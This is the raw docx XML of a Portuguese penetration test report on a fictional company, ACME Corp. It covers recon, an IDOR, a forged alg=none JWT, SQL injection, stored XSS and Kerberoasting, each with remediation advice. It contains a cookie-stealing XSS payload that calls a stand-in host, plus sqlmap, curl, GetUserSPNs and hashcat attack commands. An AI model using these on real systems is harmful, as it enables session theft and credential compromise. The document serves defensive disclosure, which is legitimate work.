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194FE3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SURICATOOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relatório Técnico</w:t>
      </w:r>
    </w:p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Avaliação de Segurança Ofensiva — ACME Corp (Web + AD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6/12/2026, 3:10:27 PM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 4287. Avaliação de Segurança Ofensiva — ACME Corp (Web + AD)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94FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 1. Reconhecimento e mapeamento da superfície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194FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 1.1. Enumeração de subdomínios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194FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 1.2. Fingerprinting de serviços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94FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 2. Aplicação web: autenticação e controle de acesso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94FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 3. Injeção e validação de entrada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94FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 4. Infraestrutura interna e Active Directory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94FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ 5. Validação de impacto (cadeia de exploração)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94FE3"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">❌ 6. Teste de stress de camada 7 (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 1. Reconhecimento e mapeamento da superfície</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mapear a superfície externa e interna autorizada da ACME Corp e priorizar vetores de maior risco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escopo autorizado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Domínios: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">acme.example</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">*.acme.example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Faixa interna: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">10.20.0.0/16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (VPN de teste fornecida)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Janela: 02–06/jun, fora do horário comercial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resumo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identificados 4 ativos expostos relevantes e 1 caminho de entrada para a rede interna.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94FE3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Ativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="194FE3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Serviço</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="194FE3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Observação</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">loja.acme.example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">HTTPS (nginx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Aplicação principal de e-commerce</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">api.acme.example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">HTTPS (REST)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">API de pedidos/contas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">vpn.acme.example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">IKEv2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Acesso remoto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">10.20.10.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">SMB/LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Controlador de domínio </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:shd w:fill="F3F4F6" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="FF7678" w:sz="18" w:space="12"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️ Todas as ações foram conduzidas dentro do escopo autorizado e com PoC não destrutiva.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 1.1. Enumeração de subdomínios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coleta passiva (CT logs, DNS) e ativa (bruteforce controlado).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subdomínios vivos confirmados:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="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 coleta passiva + resolução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subfinder -d acme.example -silent | dnsx -silent -a -resp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loja.acme.example   A 203.0.113.20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api.acme.example    A 203.0.113.21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6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vpn.acme.example    A 203.0.113.30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 1.2. Fingerprinting de serviços</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identificação de tecnologias e versões.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="16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loja.acme.example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nginx 1.24, app Node.js/Express, JWT em cookie de sessão.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api.acme.example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REST atrás de nginx; rotas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/v1/orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/v1/users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TLS 1.2/1.3, sem vulnerabilidades de protocolo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 2. Aplicação web: autenticação e controle de acesso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avaliar autenticação, gestão de sessão e autorização (IDOR/BOLA) na loja e na API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dois achados de alto impacto na camada de autorização e sessão.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achado 2.1 — IDOR/BOLA em /api/v1/orders/{id} (Alto)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94FE3" w:val="clear"/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shd w:fill="194FE3" w:val="clear"/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p>
            <w:r>
              <w:t xml:space="preserve">Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Alto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CVSS 8.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-639 / OWASP API1:2023 (BOLA)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Confirmado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um usuário autenticado consegue ler pedidos de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">outros</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> clientes apenas trocando o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,
sem verificação de propriedade no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="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 Sessão do usuário A (id de pedido próprio = 10231); acesso ao pedido de outro cliente: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curl -s https://api.acme.example/api/v1/orders/10232 \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-H "Authorization: Bearer $TOKEN_A" | jq '{id, customer, total, address}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6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-&gt; retorna dados de cliente DISTINTO (nome, endereço, itens, total)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exposição de PII e histórico de compras de toda a base.
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> validar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">order.customer_id == session.user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no servidor; preferir referências
indiretas (UUID por usuário) e testes de autorização por objeto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achado 2.2 — JWT aceitando alg=none (Crítico)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94FE3" w:val="clear"/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shd w:fill="194FE3" w:val="clear"/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p>
            <w:r>
              <w:t xml:space="preserve">Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Crítico</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CVSS 9.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-347 (verificação de assinatura ausente)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Confirmado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A API aceita tokens com cabeçalho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">{"alg":"none"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, permitindo forjar identidade/elevação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="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 token forjado (sem assinatura) elevando para role=admin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header  = {"alg":"none","typ":"JWT"}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payload = {"sub":"10231","role":"admin"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6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aceito por api.acme.example -&gt; acesso a endpoints administrativos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fixar o algoritmo esperado (ex.: RS256) no verificador; rejeitar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;
rotacionar segredos e invalidar sessões emitidas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 3. Injeção e validação de entrada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testar injeção (SQL/NoSQL), XSS e desserialização nos pontos de entrada da loja.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achado 3.1 — SQL Injection boolean/time-based em /buscar (Crítico)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94FE3" w:val="clear"/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shd w:fill="194FE3" w:val="clear"/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p>
            <w:r>
              <w:t xml:space="preserve">Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Crítico</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CVSS 9.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-89 / OWASP A03:2021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Confirmado (PoC de leitura, não destrutiva)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> é concatenado diretamente na query. Extração inferencial confirmada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="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sqlmap -u "https://loja.acme.example/buscar?q=tenis" \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--batch --technique=BT --dbms=postgres --banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6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 parameter 'q' is injectable (boolean-based, time-based)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consultas parametrizadas/prepared statements; ORM seguro; WAF como camada extra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achado 3.2 — XSS armazenado em avaliações de produto (Médio)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94FE3" w:val="clear"/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shd w:fill="194FE3" w:val="clear"/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p>
            <w:r>
              <w:t xml:space="preserve">Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Médio</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CVSS 6.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">CWE-79 / OWASP A03:2021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Confirmado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload persiste no comentário e executa no contexto de outros usuários.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="12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&lt;img src=x onerror="fetch('https://c2.teste/'+document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> codificação de saída por contexto; CSP estrita; sanitização no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 4. Infraestrutura interna e Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A partir do acesso interno autorizado (VPN), avaliar exposição do AD e caminhos de movimentação lateral.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achado 4.1 — Kerberoasting de conta de serviço (Alto)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94FE3" w:val="clear"/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shd w:fill="194FE3" w:val="clear"/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p>
            <w:r>
              <w:t xml:space="preserve">Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Alto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CVSS 8.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">T1558.003 (MITRE ATT&amp;CK)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Confirmado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conta de serviço </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F3F4F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> com SPN e senha fraca permitiu extração e quebra offline do hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6" w:val="clear"/>
        <w:spacing w:after="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GetUserSPNs.py acme.example/teste:'&lt;senha-lab&gt;' -dc-ip 10.20.10.5 -request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F3F4F6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hashcat -m 13100 svc_sql.hash rockyou.txt   # senha recuperada offline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> senhas longas/aleatórias para contas de serviço (gMSA); monitorar TGS-REQ anômalos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Achado 4.2 — SMB signing desabilitado (Médio)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94FE3" w:val="clear"/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shd w:fill="194FE3" w:val="clear"/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p>
            <w:r>
              <w:t xml:space="preserve">Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Médio</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (CVSS 5.9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">T1557.001 (NTLM relay)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Confirmado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
